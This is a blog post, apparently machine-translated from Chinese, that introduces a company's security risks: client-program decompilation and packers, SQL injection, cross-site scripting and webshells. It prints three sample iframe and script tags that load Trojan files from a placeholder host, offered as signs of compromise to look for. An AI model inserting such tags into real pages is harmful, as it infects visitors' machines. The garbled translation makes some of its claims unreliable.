I have been working for 2 weeks and have learned about the company's situation. Because the company is an operating website, the security of the website is very important. Therefore, when I was at home a few days ago, I used my spare time to perform a security test on all the products of the company. The detection results were amazing, and the bug caused all customer data of the company to be leaked, in addition, the data can be maliciously modified or damaged at will. If this is discovered by others, the loss of the company can be imagined. Then, contact the manager immediately to learn the situation. My colleagues have 3-5 years of work experience, but I don't even care about these security issues? Still don't know? This is not important. It is important that I have discovered a bug. So today I want to write some articles that I hope I can give new understandings to my friends I have never touched, it may not be fully explained in this article.
First, let's talk about the C/S architecture program. All the dynamic link library and configuration information of the program are stored on the client, which means that if the software protection measures are not completed, the program may be infiltrated at any time and the risk of getting rid of the program will be eliminated.
For example, assume that we have a C/S client program which provides some commercial functions for customers and is charged. Then some user information will be stored in the database. You need to enter your account and password through the program to log on to the database for verification, and return your consumption information to the client program for display. During the login process, you should pay attention to the verification of user input data. If the verification is not performed, some malicious data is submitted to the server, which may directly bypass the verification and you can use the software. The most obvious problem isSQL InjectionI don't want to explain how much harm SQL injection can cause. For details, refer to these SQL injection methods. You can obtain all the information about your database, and you can directly obtain the permissions of your database server to control your server just like your own machine.
We can worry about and handle user data problems. The most important problem is program protection. The software has the concept of a protective shell, which means to encrypt the compiled software so that the software cannot be decompiled or obtain program resources through resource viewing tools, these are my personal understandings and may be unprofessional. "No shell", The program after normal compilation is stateless, you can easily decompile the program through tools, or modify resources. You can use the peid v0.94 tool to check whether there is a shell.
This is a program made of winform. You can view the results with peid. It is clear that the software is developed with Microsoft Visual C #/basic. net. If it is a shell program of Delphi or C ++, you can also see it. There is alsoThe Shuhua tool can disguise the program written by. NET as C ++, VB, and Delphi. Of course, it is just a disguise. I will not introduce it here. What does this mean? If you know the language in which the program is written, you can find the corresponding decompilation software or resource modification software to modify your program. For example, the. NET decompilation ToolReflector has the ability to decompile the source code of the program. Of course, only the shell-less code can be decompiled successfully. I usually use Delphi, C ++, and other programs.Compile exclusive, reshacker, resscope and other tools. These tools can decompile the interfaces of a shell program and modify the copyright and other information at will, some Chinese software on the Internet adopts this method.
So what about software with shell? What aboutShellingWhat about it? The software that has been shelled encrypts all resources, so that the resources cannot be decompiled or modified. However, shelling is not absolutely safe, because shelling can be performed, but with the increasing difficulty of modifying the algorithm of shelling software, the most powerful shell I have ever encountered is a commercial protective shell outside China.Themida, I have never succeeded in Shell removal. No one on the internet can handle this case for websites that specifically discuss software security.
As for how to shell, simple addition only uses tools for encryption, which is generally relatively strong abroad. Here I will introduce you to a software security website. When I access my computer, this website is very popular and famous in China. Looking at the snow software security website, he downloaded many software security tools.
Let's talk about the common attack methods of web programs. I think some of my friends may find several types of source code in their website's source code.
<IFRAME src = http://www.xxx.com/muma.html width = 0 Height = 0> </iframe>
<SCRIPT src = http://www.xxx.com/muma.js> </SCRIPT>
<Script language = "jscript. encode" src = http://www.xxx.com/muma.txt> </SCRIPT>
If you find code similar to the above in your website (this is only common), your website must have security problems, or your server may be hacked, it is also possible that machines on the same Intranet with your server are intruded. This situation is called"TrojanFrom the programmer's point of view, this is just to introduce a script file or a framework to connect to a page, which may not affect my display effect. However, the pages or JS they introduced have this major crisis. It can enable Trojans or viruses in the User Machines accessing your website, or even the machines under control. The code of the accessed page is called"Wangma", Network horses are generally created through operating system vulnerabilities. That is to say, if your machine is installed with a Microsoft Update patch, the chance of your network horse is relatively small, but you cannot say no, because there may be"Oday network horse", Oday is an unknown security vulnerability. It can be said that Microsoft has not published patches or discovered vulnerabilities.
Similarly, you must strictly filter the information that users enter on the website. Otherwise, SQL injection andCross-SiteVulnerability. For example, your website has an article posting function. If you do not filter the string or HTML badge or script, when a script is inserted into the database, you must filter the information.
Some of my friends' websites have been maliciously modified, but they have been found and the code has been modified. After a while, they have been hung up. This is most likely due to the following situations:
1.WebshellGet
2. Server intrusion
3. intrusion into a machine on the server Intranet
Webshell is a Web intrusion script attack tool. To put it simply, webshell is an ASP or PHP Trojan backdoor. After hackers intrude into a website, they often place these ASP or PHP Trojan backdoor files in the web directory of the website server, mixed with normal webpage files. Then hackers can use the web method to control the website server through ASP or PHP Trojan backdoor, including uploading and downloading files, viewing databases, and executing arbitrary program commands. Google can find many articles to prevent webshell attacks. Attackers can exploit webshell to prevent attacks.Privilege Escalation, server permissions, and direct control of the server to perform any operations.
This is something I have learned. I have not explained many words, because there are a lot of detailed information on the Internet that can be searched. I hope all my friends can pay attention to security issues, or share messages if they have more things to pay attention.